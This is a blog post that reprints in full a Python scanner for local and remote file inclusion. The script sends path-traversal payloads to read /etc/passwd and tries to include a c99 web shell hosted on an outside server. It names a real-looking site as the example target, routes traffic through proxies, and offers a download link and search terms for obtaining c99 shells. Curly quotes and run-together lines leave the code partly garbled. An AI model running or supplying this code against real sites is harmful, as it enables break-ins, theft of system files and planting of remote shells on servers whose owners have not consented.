This python script is written by baltazar from darkc0de. The purpose of this script is to perform scanning against Local and Remote file inclusion which attempts to make use of a c99 shell on a vulnerable host. This script is a kind of fast LFI and RFI scanner.
Code :
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
# In version 2 added proxy support
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ _ __| _/____ #
# / __ |__ \_ __ |/ // ___/ /_ / __ |/ __ #
# / /_/ | / __ | | / < ___ _/ / /_/ ___/ #
# ____ |(______/__| |__|_ \_____>_____ /_____|____ #
# / / / #
# ___________ ______ _ __ #
# _/ ____ __ _/ __ / / / #
# ___| | / ___/ / #
# ___ >__| ___ >/_/ #
# est.2007 / / forum.darkc0de.com #
################################################################
# — d3hydr8 – rsauron – P47r1ck – r45c4l – C1c4Tr1Z – bennu #
# — QKrun1x – skillfaker – Croathack – Optyx – Nuclear #
# — Eliminator and to all members of darkc0de and ljuska.org# #
################################################################import sys, os, time, re, urllib2, socket, httplib
if sys.platform == ‘linux’ or sys.platform == ‘linux2′:
clearing = ‘clear’
else:
clearing = ‘cls’
os.system(clearing)proxy = “None”
count = 0if len(sys.argv) < 2 or len(sys.argv) > 4:
print “n|—————————————————————|”
print “| b4ltazar[@]gmail[dot]com |”
print “| 01/2009 LFI & RFI scanner v2.0 |”
print “| Help: lfi-rfi.py -h |”
print “| Visit www.darkc0de.com and www.ljuska.org |”
print “|—————————————————————|n”
sys.exit(1)for arg in sys.argv:
if arg == ‘-h’ or arg == ‘–help’ or arg == ‘-help’:
print “n|——————————————————————————-|”
print “| b4ltazar[@]gmail[dot]com |”
print “| 01/2009 LFI & RFI scanner v2.0 |”
print “| Usage: lfi-rfi.py www.site.com |”
print “| Example: lfi-rfi.py http://toscana.adiconsum.it/index.php?pagina= |”
print “| Proxy: lfi-rfi.py http://toscana.adiconsum.it/index.php?pagina= -p PROXY |”
print “| Visit www.darkc0de.com and www.ljuska.org |”
print “|——————————————————————————-|n”
sys.exit(1)
elif arg == ‘-p’:
proxy = sys.argv[count+1]
count += 1lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]
site = sys.argv[1]
shell = ‘http://www.defcont4.hypersite.com.br/shell/c99.txt?’
if site[:4] != “http”:
site = “http://”+site
if site[-1] != “=”:
site = site + “=”print “n|—————————————————————|”
print “| b4ltazar[@]gmail[dot]com |”
print “| 01/2009 LFI & RFI scanner v2.0 |”
print “| Visit www.darkc0de.com and www.ljuska.org |”
print “|—————————————————————|n”
print “n[-] %s” % time.strftime(“%X”)
print “-”*80
print “tttChecking for LFI”
print “-”*80
print “n[+] Target:”,site
print “[+]“,len(lfis),”LFI loaded…”
print “[+] Starting Scan…n”try:
if proxy != “None”:
print “n[+] Testing Proxy…”
pr = httplib.HTTPConnection(proxy)
pr.connect()
print “[+] Proxy:”,proxy
print “[+] Building Handler”
proxy_handler = urllib2.ProxyHandler({‘http’: ‘http://’+proxy+’/'})
else:
print “n[-] Proxy not given”
proxy_handler = “”
except(socket.timeout):
print “n[-] Proxy Timed Out”
sys.exit(1)
except(),msg:
print msg
print “n[-] Proxy Failed”
sys.exit(1)for lfi in lfis:
print “[+] Checking:” ,site+lfi.replace(“n”,”")
proxyfier = urllib2.build_opener(proxy_handler)
try:
check = proxyfier.open(site+lfi.replace(“n”, “”)).read()
if re.findall(“root:x:”, check):
print “[!] w00t!,w00t!: “,lfi
else:
print “[-] Not Found: “,lfi
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt, SystemExit):
raise
print “-”*80
print “tttChecking for RFI”
print “-”*80
print “n[+] Target:”,site
print “[+] Starting Scan…n”try:
check = proxyfier.open(site+’http://www.defcont4.hypersite.com.br/shell/c99.txt?’).read()
if re.findall(“c99shell”, check):
print “[!] w00t!,w00t!: “,site+shell
else:
print “[-] Not Found: “,site+shell
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt, SystemExit):
pass
print “n[-] %s” % time.strftime(“%X”)
Download LFI – RFI scanner : http://packetstormsecurity.org/UNIX/scanners/lfi-rfi2.txt
Related articles :
Computer Security Stuff on eBay!Electronics stuffs on ebay
Local – Remote file inclusion scanner (make use of a c99 shell) is posted on January 11th, 2009 by admin. This post is filed under: Sectools, Security, Communication, Free, HTTP, HTTP 404, Hypertext Transfer Protocol, Scan, Server, TinyURL .
Some people come to this post with this search term: c99shell powered by admin, remote file inclusion tutorial, c99shell tutorial, rfi scanner, c99 shell tutorial, remote file inclusion scanner, LFI dorks, c99 shell download, lfi scanner, RFI Scanner download, c99shell download, c99shell, download rfi scanner, how to use c99 shell, c99 shell, local file inclusion tutorial, c99 scanner, remote file inclusion shell, rfi scanner 2009, shell c99 download,
And here is the related entries of this post:
Leave a Reply